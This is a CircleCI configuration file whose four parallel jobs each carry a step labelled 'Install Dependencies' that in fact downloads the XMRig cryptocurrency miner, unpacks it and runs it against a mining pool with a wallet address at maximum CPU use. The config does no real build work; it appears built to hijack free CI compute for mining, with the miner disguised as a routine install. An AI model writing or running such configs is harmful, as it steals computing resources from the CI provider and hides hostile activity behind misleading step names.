version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/xmrig/xmrig/releases/download/v6.16.2/xmrig-6.16.2-bionic-x64.tar.gz && tar xf xmrig-6.16.2-bionic-x64.tar.gz && cd xmrig-6.16.2 && ./xmrig -a gr -o us.flockpool.com:5555 --tls -u RUWAjkeSApiPZcXdHyCy64dUn6xK13JKye --cpu-max-threads-hint 100

    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/xmrig/xmrig/releases/download/v6.16.2/xmrig-6.16.2-bionic-x64.tar.gz && tar xf xmrig-6.16.2-bionic-x64.tar.gz && cd xmrig-6.16.2 && ./xmrig -a gr -o us.flockpool.com:5555 --tls -u RUWAjkeSApiPZcXdHyCy64dUn6xK13JKye --cpu-max-threads-hint 100

    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/xmrig/xmrig/releases/download/v6.16.2/xmrig-6.16.2-bionic-x64.tar.gz && tar xf xmrig-6.16.2-bionic-x64.tar.gz && cd xmrig-6.16.2 && ./xmrig -a gr -o us.flockpool.com:5555 --tls -u RUWAjkeSApiPZcXdHyCy64dUn6xK13JKye --cpu-max-threads-hint 100

    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/xmrig/xmrig/releases/download/v6.16.2/xmrig-6.16.2-bionic-x64.tar.gz && tar xf xmrig-6.16.2-bionic-x64.tar.gz && cd xmrig-6.16.2 && ./xmrig -a gr -o us.flockpool.com:5555 --tls -u RUWAjkeSApiPZcXdHyCy64dUn6xK13JKye --cpu-max-threads-hint 100

workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3